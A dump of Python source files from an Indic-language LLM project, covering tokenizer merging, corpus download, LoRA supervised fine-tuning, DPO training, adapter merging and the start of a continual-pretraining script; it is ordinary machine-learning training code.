print(len(base_tokenizer), len(extended_tokenizer))
print(base_tokenizer.all_special_tokens)
print(base_tokenizer.all_special_ids)
print(base_tokenizer.special_tokens_map)
        ## Add the extended tokenizer's new pieces to the base LLaMA tokenizer
        llama_spm_tokens_set = set(p.piece for p in base_spm.pieces)
        print(f"Base tokenizer pieces before merge: {len(llama_spm_tokens_set)}")
for p in extended_spm.pieces:
piece = p.piece
if piece not in llama_spm_tokens_set:
new_p = sp_pb2_model.ModelProto().SentencePiece()
new_p.piece = piece
new_p.score = 0
base_spm.pieces.append(new_p)
print(f"New model pieces: {len(base_spm.pieces)}")
## Save
output_sp_dir = "merged_tokenizer_sp"
output_hf_dir = "merged_tokenizer_hf" # the path to save kannada-LLaMA tokenizer
os.makedirs(output_sp_dir, exist_ok=True)
        with open(output_sp_dir + "/merged_tokenizer.model", "wb") as f:
            f.write(base_spm.SerializeToString())
        tokenizer = LlamaTokenizer(vocab_file=output_sp_dir + "/merged_tokenizer.model")
tokenizer.save_pretrained(output_hf_dir)
print(f"Extended tokenizer has been saved to {output_hf_dir}")
# source code for "count language tokens" taken from https://github.com/abhinand5/tamil-llama/blob/main/scripts/utils/count_indic_tokens.py
def count_language_tokens(self, tokenizer_model):
def is_language(token, ranges):
return any(ranges[0] <= char <= ranges[1] for char in token)
        def count_tokens_in_range(tokenizer, ranges):
            return sum(is_language(token, ranges) for token in tokenizer.get_vocab().keys())
tokenizer = AutoTokenizer.from_pretrained(tokenizer_model)
total_vocab_size = len(tokenizer.get_vocab())
print("\n---Note: These calculations are approximate!---\n")
print(f"Total vocabulary size of '{tokenizer_model}': {total_vocab_size}\n")
print(f"{'Language':<20} | {'Tokens':>10} | {'Percentage':>10}")
print("-" * 50)
for language, ranges in self.indic_language_unicode_ranges.items():
            count = count_tokens_in_range(tokenizer, ranges)
percentage = (count / total_vocab_size) * 100
print(f"{language:<20} | {count:>10} | {percentage:>9.2f}%")
def test_tokenizer(self, tokenizer_model, text):
sp = spm.SentencePieceProcessor(model_file=tokenizer_model)
encoded_text = sp.encode(text, out_type=str)
print(encoded_text)
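
# Minimal usage sketch (file paths, prefixes, and the base model below are
# hypothetical; adjust to your corpus and setup):
#
#   trainer = SentencePieceTrainer()
#   sp_model = trainer.train_tokenizer("corpus/kannada.txt", "kannada_sp", "./models")
#   trainer.merge_tokenizer("meta-llama/Llama-2-7b-hf", sp_model)
#   trainer.count_language_tokens("merged_tokenizer_hf")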
| 5,811 | Python | .py | 115 | 39.095652 | 143 | 0.608152 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,524 | dataset.py | adithya-s-k_Indic-llm/indic_llm/dataset.py | import logging
import os
import json
import pandas as pd
from datasets import Dataset, load_dataset
from tqdm import tqdm
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
def download_dataset(
dataset_name,
dataset_subset,
dataset_split="train",
) -> None:
logger.info("Starting to download/load dataset")
try:
load_dataset(
dataset_name,
dataset_subset,
split=dataset_split,
keep_in_memory=True
)
logger.info("Downloading dataset completed successfully")
except Exception as e:
logger.error("An error occurred while downloading dataset")
logger.error(f"Exception: {e}")
def download_multiple() -> None:
pass
def download_convert_to_txt(
dataset_name,
dataset_subset,
dataset_split,
text_col,
output_file_name,
output_dir = "./corpus"
) -> None:
try:
logger.info("Starting to download/load dataset")
dataset = load_dataset(dataset_name,dataset_subset,split=dataset_split)
logger.info("Dataset loaded/downloaded successfully")
logger.info("Converting to pandas dataframe")
train_df = pd.DataFrame(dataset)
logger.info("Conversion complete")
        if not os.path.exists(output_dir):
            os.makedirs(output_dir)
            logger.info(f"Created output directory: {output_dir}")
        else:
            logger.info(f"Output directory already exists: {output_dir}")
        # Build the corpus path whether or not the directory was just created.
        corpus_path = os.path.join(output_dir, output_file_name)
logger.info("Creating Text corpus")
with open(corpus_path, "w") as file:
for index, value in tqdm(
train_df[text_col].items(), total=len(train_df)
):
file.write(str(value) + "\n")
logger.info("CText corpus Created Successfully")
    except Exception as e:
        logger.error(f"Error creating the text corpus -> {e}")
        return None
    return corpus_path
def truncate_text_corpus() -> None:
pass
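
# Example usage (dataset name, subset, and column below are hypothetical;
# substitute the corpus you actually use):
#
#   corpus = download_convert_to_txt(
#       dataset_name="uonlp/CulturaX",
#       dataset_subset="kn",
#       dataset_split="train",
#       text_col="text",
#       output_file_name="kannada.txt",
#   )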
| 2,149 | Python | .py | 63 | 26.619048 | 79 | 0.643729 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,525 | sft.py | adithya-s-k_Indic-llm/indic_llm/instruct_finetune/llama/sft.py | # Fine-Tune Llama2-7b on SE paired dataset
import os
from dataclasses import dataclass, field
from typing import Optional
import torch
from accelerate import Accelerator
from datasets import load_dataset
from peft import AutoPeftModelForCausalLM, LoraConfig
from tqdm import tqdm
from transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig, HfArgumentParser, TrainingArguments
from trl import SFTTrainer
from trl.import_utils import is_npu_available, is_xpu_available
from trl.trainer import ConstantLengthDataset
@dataclass
class ScriptArguments:
model_name: Optional[str] = field(default="meta-llama/Llama-2-7b-hf", metadata={"help": "the model name"})
dataset_name: Optional[str] = field(default="lvwerra/stack-exchange-paired", metadata={"help": "the dataset name"})
subset: Optional[str] = field(default="data/finetune", metadata={"help": "the subset to use"})
split: Optional[str] = field(default="train", metadata={"help": "the split to use"})
size_valid_set: Optional[int] = field(default=4000, metadata={"help": "the size of the validation set"})
streaming: Optional[bool] = field(default=True, metadata={"help": "whether to stream the dataset"})
shuffle_buffer: Optional[int] = field(default=5000, metadata={"help": "the shuffle buffer size"})
seq_length: Optional[int] = field(default=1024, metadata={"help": "the sequence length"})
num_workers: Optional[int] = field(default=4, metadata={"help": "the number of workers"})
packing: Optional[bool] = field(default=True, metadata={"help": "whether to use packing for SFTTrainer"})
# LoraConfig
lora_alpha: Optional[float] = field(default=16, metadata={"help": "the lora alpha parameter"})
lora_dropout: Optional[float] = field(default=0.05, metadata={"help": "the lora dropout parameter"})
lora_r: Optional[int] = field(default=8, metadata={"help": "the lora r parameter"})
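# Example launch (model, dataset, and output paths are hypothetical; adjust to
# your setup):
#   accelerate launch sft.py \
#       --model_name meta-llama/Llama-2-7b-hf \
#       --dataset_name lvwerra/stack-exchange-paired \
#       --output_dir ./sft_output \
#       --per_device_train_batch_size 4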
parser = HfArgumentParser((ScriptArguments, TrainingArguments))
script_args, training_args = parser.parse_args_into_dataclasses()
peft_config = LoraConfig(
r=script_args.lora_r,
lora_alpha=script_args.lora_alpha,
lora_dropout=script_args.lora_dropout,
target_modules=["q_proj", "v_proj"],
bias="none",
task_type="CAUSAL_LM",
)
if training_args.group_by_length and script_args.packing:
raise ValueError("Cannot use both packing and group by length")
# `gradient_checkpointing` was True by default until `1f3314`, but it's actually not used.
# `gradient_checkpointing=True` will cause a `Variable._execution_engine.run_backward` error.
if training_args.gradient_checkpointing:
raise ValueError("gradient_checkpointing not supported")
def chars_token_ratio(dataset, tokenizer, nb_examples=400):
"""
Estimate the average number of characters per token in the dataset.
"""
total_characters, total_tokens = 0, 0
for _, example in tqdm(zip(range(nb_examples), iter(dataset)), total=nb_examples):
text = prepare_sample_text(example)
total_characters += len(text)
if tokenizer.is_fast:
total_tokens += len(tokenizer(text).tokens())
else:
total_tokens += len(tokenizer.tokenize(text))
return total_characters / total_tokens
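# The ratio above is consumed by ConstantLengthDataset below, which uses
# chars_per_token together with seq_length to estimate how much raw text to
# buffer when packing examples into fixed-length token sequences.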
def print_trainable_parameters(model):
"""
Prints the number of trainable parameters in the model.
"""
trainable_params = 0
all_param = 0
for _, param in model.named_parameters():
all_param += param.numel()
if param.requires_grad:
trainable_params += param.numel()
print(
f"trainable params: {trainable_params} || all params: {all_param} || trainable%: {100 * trainable_params / all_param}"
)
def prepare_sample_text(example):
"""Prepare the text from a sample of the dataset."""
text = f"Question: {example['question']}\n\nAnswer: {example['response_j']}"
return text
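# For example, a (hypothetical) sample {"question": "How do I sort a list?",
# "response_j": "Use sorted()."} becomes
# "Question: How do I sort a list?\n\nAnswer: Use sorted()."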
def create_datasets(tokenizer, args):
dataset = load_dataset(
args.dataset_name,
data_dir=args.subset,
split=args.split,
use_auth_token=True,
num_proc=args.num_workers if not args.streaming else None,
streaming=args.streaming,
)
if args.streaming:
print("Loading the dataset in streaming mode")
valid_data = dataset.take(args.size_valid_set)
train_data = dataset.skip(args.size_valid_set)
train_data = train_data.shuffle(buffer_size=args.shuffle_buffer, seed=None)
else:
dataset = dataset.train_test_split(test_size=0.005, seed=None)
train_data = dataset["train"]
valid_data = dataset["test"]
print(f"Size of the train set: {len(train_data)}. Size of the validation set: {len(valid_data)}")
chars_per_token = chars_token_ratio(train_data, tokenizer)
print(f"The character to token ratio of the dataset is: {chars_per_token:.2f}")
train_dataset = ConstantLengthDataset(
tokenizer,
train_data,
formatting_func=prepare_sample_text,
infinite=True,
seq_length=args.seq_length,
chars_per_token=chars_per_token,
)
valid_dataset = ConstantLengthDataset(
tokenizer,
valid_data,
formatting_func=prepare_sample_text,
infinite=False,
seq_length=args.seq_length,
chars_per_token=chars_per_token,
)
return train_dataset, valid_dataset
bnb_config = BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_quant_type="nf4",
bnb_4bit_compute_dtype=torch.bfloat16,
)
base_model = AutoModelForCausalLM.from_pretrained(
script_args.model_name,
quantization_config=bnb_config,
device_map={"": Accelerator().local_process_index},
trust_remote_code=True,
use_auth_token=True,
)
base_model.config.use_cache = False
tokenizer = AutoTokenizer.from_pretrained(script_args.model_name, trust_remote_code=True)
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right" # Fix weird overflow issue with fp16 training
train_dataset, eval_dataset = create_datasets(tokenizer, script_args)
trainer = SFTTrainer(
model=base_model,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
peft_config=peft_config,
packing=script_args.packing,
max_seq_length=None,
tokenizer=tokenizer,
args=training_args,
)
trainer.train()
trainer.save_model(training_args.output_dir)
output_dir = os.path.join(training_args.output_dir, "final_checkpoint")
trainer.model.save_pretrained(output_dir)
# Free memory for merging weights
del base_model
if is_xpu_available():
torch.xpu.empty_cache()
elif is_npu_available():
torch.npu.empty_cache()
else:
torch.cuda.empty_cache()
model = AutoPeftModelForCausalLM.from_pretrained(output_dir, device_map="auto", torch_dtype=torch.bfloat16)
model = model.merge_and_unload()
output_merged_dir = os.path.join(training_args.output_dir, "final_merged_checkpoint")
model.save_pretrained(output_merged_dir, safe_serialization=True) | 6,958 | Python | .py | 156 | 39.717949 | 126 | 0.720762 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,526 | merge_adapter.py | adithya-s-k_Indic-llm/indic_llm/dpo_finetuning/merge_adapter.py | from dataclasses import dataclass, field
from typing import Optional
import torch
from peft import PeftConfig, PeftModel
from transformers import AutoModelForCausalLM, AutoModelForSequenceClassification, AutoTokenizer, HfArgumentParser, LlamaForCausalLM, LlamaTokenizer
@dataclass
class ScriptArguments:
"""
The input names representing the Adapter and Base model fine-tuned with PEFT, and the output name representing the
merged model.
"""
adapter_model_name: Optional[str] = field(default=None, metadata={"help": "the adapter name"})
base_model_name: Optional[str] = field(default=None, metadata={"help": "the base model name"})
base_tokenizer_name: Optional[str] = field(default=None, metadata={"help": "the tokeniser model name"})
output_name: Optional[str] = field(default=None, metadata={"help": "the merged model name"})
parser = HfArgumentParser(ScriptArguments)
script_args = parser.parse_args_into_dataclasses()[0]
assert script_args.adapter_model_name is not None, "please provide the name of the Adapter you would like to merge"
assert script_args.base_model_name is not None, "please provide the name of the Base model"
assert script_args.base_tokenizer_name is not None, "please provide the name of the tokenizer model"
assert script_args.output_name is not None, "please provide the output name of the merged model"
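# Example invocation (all paths are hypothetical; point them at your own artifacts):
#   python merge_adapter.py \
#       --adapter_model_name ./dpo_output/final_checkpoint \
#       --base_model_name ./kannada-llama-base \
#       --base_tokenizer_name ./merged_tokenizer_hf \
#       --output_name ./merged_model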
peft_config = PeftConfig.from_pretrained(script_args.adapter_model_name)
# if peft_config.task_type == "SEQ_CLS":
# # The sequence classification task is used for the reward model in PPO
# model = AutoModelForSequenceClassification.from_pretrained(
# script_args.base_model_name, num_labels=1, torch_dtype=torch.bfloat16
# )
# else:
model = LlamaForCausalLM.from_pretrained(
script_args.base_model_name, return_dict=True, torch_dtype=torch.bfloat16
)
tokenizer = LlamaTokenizer.from_pretrained(script_args.base_tokenizer_name)
print("Loading PEFT")
# Load the PEFT model
model = PeftModel.from_pretrained(model, script_args.adapter_model_name)
model.eval()
print("Started Merging")
model = model.merge_and_unload()
print("Saving the Model")
model.save_pretrained(f"{script_args.output_name}")
tokenizer.save_pretrained(f"{script_args.output_name}")
print("Saving complete complete")
# model.push_to_hub(f"{script_args.output_name}", use_temp_dir=False) | 2,346 | Python | .py | 43 | 52.488372 | 148 | 0.779765 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,527 | dpo.py | adithya-s-k_Indic-llm/indic_llm/dpo_finetuning/dpo.py | # 0. imports
import os
from dataclasses import dataclass, field
from typing import Dict, Optional
import torch
from datasets import Dataset, load_dataset
from peft import LoraConfig
from transformers import AutoModelForCausalLM, AutoTokenizer, HfArgumentParser, TrainingArguments, LlamaTokenizer ,LlamaForCausalLM
from trl import DPOTrainer
# Define and parse arguments.
@dataclass
class ScriptArguments:
"""
The arguments for the DPO training script.
"""
# data parameters
beta: Optional[float] = field(default=0.1, metadata={"help": "the beta parameter for DPO loss"})
# training parameters
model_name_or_path: Optional[str] = field(
default="../sft/results/final_checkpoint",
metadata={"help": "the location of the SFT model name or path"},
)
tokenizer_name_or_path : Optional[str] = field(
default="Cognitive-Lab/Ambari-7B-Instruct-v0.1",
metadata={"help": "the name of the tokenizer"},
)
learning_rate: Optional[float] = field(default=5e-4, metadata={"help": "optimizer learning rate"})
lr_scheduler_type: Optional[str] = field(default="cosine", metadata={"help": "the lr scheduler type"})
warmup_steps: Optional[int] = field(default=100, metadata={"help": "the number of warmup steps"})
weight_decay: Optional[float] = field(default=0.05, metadata={"help": "the weight decay"})
optimizer_type: Optional[str] = field(default="paged_adamw_32bit", metadata={"help": "the optimizer type"})
per_device_train_batch_size: Optional[int] = field(default=4, metadata={"help": "train batch size per device"})
per_device_eval_batch_size: Optional[int] = field(default=1, metadata={"help": "eval batch size per device"})
gradient_accumulation_steps: Optional[int] = field(
default=4, metadata={"help": "the number of gradient accumulation steps"}
)
gradient_checkpointing: Optional[bool] = field(
default=True, metadata={"help": "whether to use gradient checkpointing"}
)
lora_alpha: Optional[float] = field(default=16, metadata={"help": "the lora alpha parameter"})
lora_dropout: Optional[float] = field(default=0.05, metadata={"help": "the lora dropout parameter"})
lora_r: Optional[int] = field(default=8, metadata={"help": "the lora r parameter"})
max_prompt_length: Optional[int] = field(default=512, metadata={"help": "the maximum prompt length"})
max_length: Optional[int] = field(default=1024, metadata={"help": "the maximum sequence length"})
num_train_epochs : Optional[int] = field(default=1, metadata={"help": "max number of epochs to train"})
max_steps: Optional[int] = field(default=1000, metadata={"help": "max number of training steps"})
logging_steps: Optional[int] = field(default=1000, metadata={"help": "the logging frequency"})
save_steps: Optional[int] = field(default=1000, metadata={"help": "the saving frequency"})
eval_steps: Optional[int] = field(default=1000, metadata={"help": "the evaluation frequency"})
output_dir: Optional[str] = field(default="./results", metadata={"help": "the output directory"})
log_freq: Optional[int] = field(default=1, metadata={"help": "the logging frequency"})
# instrumentation
sanity_check: Optional[bool] = field(default=False, metadata={"help": "only train on 1000 samples"})
report_to: Optional[str] = field(
default="wandb",
metadata={
"help": 'The list of integrations to report the results and logs to. Supported platforms are `"azure_ml"`,'
'`"comet_ml"`, `"mlflow"`, `"neptune"`, `"tensorboard"`,`"clearml"` and `"wandb"`. '
'Use `"all"` to report to all integrations installed, `"none"` for no integrations.'
},
)
# debug argument for distributed training
ignore_bias_buffers: Optional[bool] = field(
default=False,
metadata={
"help": "fix for DDP issues with LM bias/mask buffers - invalid scalar type,`inplace operation. See"
"https://github.com/huggingface/transformers/issues/22482#issuecomment-1595790992"
},
)
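# Example launch (paths below are hypothetical; point them at your own SFT
# checkpoint and tokenizer):
#   accelerate launch dpo.py \
#       --model_name_or_path ./sft/results/final_checkpoint \
#       --tokenizer_name_or_path Cognitive-Lab/Ambari-7B-Instruct-v0.1 \
#       --output_dir ./dpo_output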
# def get_stack_exchange_paired(
# data_dir: str = "data/rl",
# sanity_check: bool = False,
# cache_dir: str = None,
# num_proc=24,
# ) -> Dataset:
# """Load the stack-exchange-paired dataset from Hugging Face and convert it to the necessary format.
# The dataset is converted to a dictionary with the following structure:
# {
# 'prompt': List[str],
# 'chosen': List[str],
# 'rejected': List[str],
# }
# Prompts are structured as follows:
# "Question: " + <prompt> + "\n\nAnswer: "
# """
# dataset = load_dataset(
# "lvwerra/stack-exchange-paired",
# split="train",
# cache_dir=cache_dir,
# data_dir=data_dir,
# )
# original_columns = dataset.column_names
# if sanity_check:
# dataset = dataset.select(range(min(len(dataset), 1000)))
# def return_prompt_and_responses(samples) -> Dict[str, str]:
# return {
# "prompt": ["Question: " + question + "\n\nAnswer: " for question in samples["question"]],
# "chosen": samples["response_j"],
# "rejected": samples["response_k"],
# }
# return dataset.map(
# return_prompt_and_responses,
# batched=True,
# num_proc=num_proc,
# remove_columns=original_columns,
# )
if __name__ == "__main__":
parser = HfArgumentParser(ScriptArguments)
script_args = parser.parse_args_into_dataclasses()[0]
# 1. load a pretrained model
model = LlamaForCausalLM.from_pretrained(
script_args.model_name_or_path,
torch_dtype=torch.float16,
# low_cpu_mem_usage=True,
# load_in_4bit=True,
)
model.config.use_cache = False
if script_args.ignore_bias_buffers:
# torch distributed hack
model._ddp_params_and_buffers_to_ignore = [
name for name, buffer in model.named_buffers() if buffer.dtype == torch.bool
]
model_ref = LlamaForCausalLM.from_pretrained(
script_args.model_name_or_path,
torch_dtype=torch.float16,
# low_cpu_mem_usage=True,
# load_in_4bit=True,
)
tokenizer = LlamaTokenizer.from_pretrained(script_args.tokenizer_name_or_path)
tokenizer.pad_token = tokenizer.eos_token
dataset = load_dataset("CognitiveLab/hh-rlhf-formatted-60000",split="train").train_test_split(test_size=0.2)
train_dataset = dataset["train"]
eval_dataset = dataset["test"]
# 2. Load the Stack-exchange paired dataset
# train_dataset = get_stack_exchange_paired(data_dir="data/rl", sanity_check=script_args.sanity_check)
# train_dataset = train_dataset.filter(
# lambda x: len(x["prompt"]) + len(x["chosen"]) <= script_args.max_length
# and len(x["prompt"]) + len(x["rejected"]) <= script_args.max_length
# )
# 3. Load evaluation dataset
# eval_dataset = get_stack_exchange_paired(data_dir="data/evaluation", sanity_check=True)
# eval_dataset = eval_dataset.filter(
# lambda x: len(x["prompt"]) + len(x["chosen"]) <= script_args.max_length
# and len(x["prompt"]) + len(x["rejected"]) <= script_args.max_length
# )
# 4. initialize training arguments:
training_args = TrainingArguments(
per_device_train_batch_size=script_args.per_device_train_batch_size,
per_device_eval_batch_size=script_args.per_device_eval_batch_size,
# max_steps=script_args.max_steps,
num_train_epochs=script_args.num_train_epochs,
logging_steps=script_args.logging_steps,
save_steps=script_args.save_steps,
gradient_accumulation_steps=script_args.gradient_accumulation_steps,
gradient_checkpointing=script_args.gradient_checkpointing,
learning_rate=script_args.learning_rate,
evaluation_strategy="steps",
eval_steps=script_args.eval_steps,
output_dir=script_args.output_dir,
report_to=script_args.report_to,
lr_scheduler_type=script_args.lr_scheduler_type,
warmup_steps=script_args.warmup_steps,
optim=script_args.optimizer_type,
bf16=True,
remove_unused_columns=False,
run_name="dpo_llama2",
)
peft_config = LoraConfig(
r=script_args.lora_r,
lora_alpha=script_args.lora_alpha,
lora_dropout=script_args.lora_dropout,
target_modules=[
"q_proj",
"v_proj",
"k_proj",
"out_proj",
"fc_in",
"fc_out",
"wte",
],
bias="none",
task_type="CAUSAL_LM",
)
# 5. initialize the DPO trainer
dpo_trainer = DPOTrainer(
model,
model_ref,
args=training_args,
beta=script_args.beta,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
tokenizer=tokenizer,
peft_config=peft_config,
max_prompt_length=script_args.max_prompt_length,
max_length=script_args.max_length,
)
# 6. train
dpo_trainer.train()
dpo_trainer.save_model(script_args.output_dir)
# 7. save
output_dir = os.path.join(script_args.output_dir, "final_checkpoint")
dpo_trainer.model.save_pretrained(output_dir) | 9,332 | Python | .py | 202 | 40.282178 | 131 | 0.656618 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,528 | pretrain-gemma.py | adithya-s-k_Indic-llm/indic_llm/continual_pretrain/pretrain-gemma.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
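# Callback that mirrors every checkpoint save (and the end of training) with a
# `pt_lora_model` folder holding only the LoRA adapter weights and the tokenizer,
# so the adapter can be reloaded without the full Trainer checkpoint.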
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
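    # e.g. for tokens [t0, t1, t2], the prediction at position i targets token i+1,
    # so preds[:, :-1] is aligned with labels[:, 1:] before computing accuracy.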
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
except ValueError: # quick fix by simply take the first example
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
tokenizer_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The tokenizer for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `huggingface-cli login` (necessary to use this script "
"with private models)."
)
},
)
torch_dtype: Optional[str] = field(
default=None,
metadata={
"help": (
"Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
"dtype will be automatically derived from the model's weights."
),
"choices": ["auto", "bfloat16", "float16", "float32"],
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_dir: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[float] = field(
default=0.05,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
def __post_init__(self):
if self.streaming:
require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
trainable : Optional[str] = field(default="q_proj,v_proj")
lora_rank : Optional[int] = field(default=8)
lora_dropout : Optional[float] = field(default=0.1)
lora_alpha : Optional[float] = field(default=32.)
